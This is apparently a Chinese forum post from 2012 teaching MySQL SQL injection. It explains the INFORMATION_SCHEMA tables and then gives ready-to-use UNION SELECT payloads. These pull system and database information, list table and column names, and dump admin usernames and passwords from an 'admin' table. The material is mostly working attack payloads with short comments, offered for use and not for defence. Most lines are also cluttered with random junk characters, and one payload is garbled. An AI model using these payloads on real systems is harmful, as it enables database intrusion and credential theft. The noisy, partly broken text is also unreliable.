本文介绍MYSQL盲注的一些语句和方法9 U7 z! b" W, \) N4 Y, I
O( v# z+ A0 X/ j学习盲注前先了解下 IFORMATION_SCHEMA 库
O1 p# [4 _, ~" g% f! v
! n8 y( y1 a2 b: y+ AMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有8 ]0 m$ m* t+ {- o- d/ P
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
- j& f- G: F+ b) g( @8 @+ }1.得到所有数据库名:
( L s/ C! o9 O* q|SCHEMATA ->存储数据库名的表4 V- t4 m" G: ]# A5 y/ r; P U- o$ ^
|---字段:SCHEMA_NAME ->数据库名称3 ^9 W6 Z! _% \8 U! P# Q/ _
8 J% f$ }, o2 b( D' n9 T
|TABLES ->存储表名! Y; `9 d- \2 V6 l' \8 y% f
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名) H. B! t) Y. U* c
|---字段:TABLE_NAME ->存储表的表名
' F3 G( d) d$ Q/ |. s* S/ L4 [- Y- Z6 c: ~7 |) }
|COLUMNS ->存储的字段名表$ ]* S, w( J# I+ Y$ X
|---字段:TABLE_SCHEMA ->该字段所属数据库名
- [" X+ x( b. S" O0 v% R|---字段:TABLE_NAME ->存储所属表的名称! B: X7 m1 m4 o6 a
9 `9 w& i& b# K+ D
|---字段:COLUMN_NAME ->该字段的名称
) j0 ~% K7 w/ ~& N7 P1 c2 Z* `0 U6 S) j/ y5 l
" V" p2 n# }# @' F
+ [! `6 ?) }, o/ G/ |+ F
###########################################################################
& U/ B) Z- T' ], v | u4 X
# } \# n4 H8 ~: H1 u, X; y0x001 获取系统信息:6 a/ v. z4 R& u; r4 D3 N
+ ]2 v4 |8 H+ \: G. p: V
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*( K- E9 |7 P" w" X- J2 ~$ p
5 a! f# ]6 ?. z/ E
/*
$ J8 y& [ j* @" i9 w& E7 n( `8 l" J5 R+ n9 f$ V2 r1 I% \
@@global.version_compile_os 获取系统版本2 P1 k' W5 E' ^
! B/ C5 l( E' O% p0 l# a8 r: D! g
@@datadir 数据库路径5 q0 a F. h7 k& H9 c: |) j! V/ P
database() 当前数据库名称8 Q: o8 E% G7 R# `* F5 T0 X* D
0x3c62723e 换行HEX值
% z# v1 q. l0 H5 j/ b/ J% `/ A7 R! O0 l6 f/ i6 L; I3 M
*/2 [. o( R3 H+ Y
8 G# P: X! Z6 D2 `
) r9 b! P* ^/ V: x0 N
" F* b. o5 w" W. K5 x: x5 [######################################################################, r8 b5 k6 K# X$ Q0 z. B
3 ]; q; x5 U$ p" p2 Q0x002 获取表名+ {3 U x; e9 [! ]" K
& p; z. k, J0 i9 ]$ W! M, Z
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
$ i7 o) A2 P# I4 q9 \1 R
. T$ ~$ N0 R$ R' h1 H+ ?! y ) G5 O! p" v7 U2 }
6 z6 v4 h6 z4 {/** {( r: G1 K% S2 i) I0 ^
# e" X+ f9 @$ A
0x67617264656e 为当前数据库名, i0 t+ @7 D/ b% B1 b1 F8 P
4 f. B9 ]8 c) ~ C& a- Vgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
+ ]2 r/ p0 C* \+ f+ o0 Z$ }* ~! {( C, N: g: M3 @
*/5 e @( |, R0 ], b
* v i5 V `6 {8 e9 I" I7 e" j' f
######################################################################8 t( O9 e3 n4 z( w- w6 M, E- `
4 m' L6 ] U1 }8 s% a; q; E
& P: n* R! M k8 [
3 e5 t% q. k& w7 S9 A0x003 获取字段
% \) `* J [5 \* o/ f7 T5 P" r, r; A5 U
/ S, ]- Q2 r" w' {9 yunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
M! x+ ~' h2 R( t8 A) F3 o2 E- I/ n; ]" ? h8 q( c1 B
/*
' U( G9 ^9 S( f+ Z5 v0 i
$ N' Y1 Z/ z6 W d: y8 h: D2 H; _group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段8 l& K7 z( A1 T/ z5 e/ \$ K: t
: C* ~7 G# w$ s3 W0x61646d696e ->选择一个表
, z" ]* O8 ~% y# Z4 N- B. `% l- m* z: `) ^& U9 L. z, D4 f# [% [
0x67617264656e ->数据库名9 b; _* O2 q* a
( l' O' C+ @% k
*/2 |8 l9 I, J6 F
; K; O, g: r; v4 N# V
#####################################################################
# z, \. w: E' o4 p9 M. \7 G+ z1 u1 e3 u% {( J5 R# ~
8 Y% H3 m. J3 r
! I" u& s# L5 G9 M
0x004 获取数据
' G" }# ?/ T! P7 q O5 X* M8 ]2 C6 ]3 g" q
union select 1,2,3
& Y! n/ G) [' b0 h3 M! v,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin$ h6 J8 F0 B$ k8 O7 c u
7 s$ M( O; M0 h' e4 [
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
) c+ G! ^8 l- [, I; w) m; T4 `* G9 @. O+ j- N
" M1 k1 h5 J9 T! X1 p6 ~* G- i
" u) a2 _' p0 F3 b$ ~
/*
! P9 T- F& f" |+ X/ e) O
. L* `, }( a4 p6 C* U& Y0x3c62723e 换行符号HEX编码
$ N# W6 J9 _9 ^+ W m4 S# N
' K$ y9 O5 D/ Jgroup_concat 同时获得该字段所有数据+ I {. T! ~1 _" X" h% G+ Z" z
! E( n1 m1 o5 i3 J4 D2 k! \0 W*/
0 m9 N! B, ~ s% D; ^4 p% D3 L" i' Y0 L/ s4 b7 M
|
发表于 2012-9-13 17:48:44
收藏
支持
反对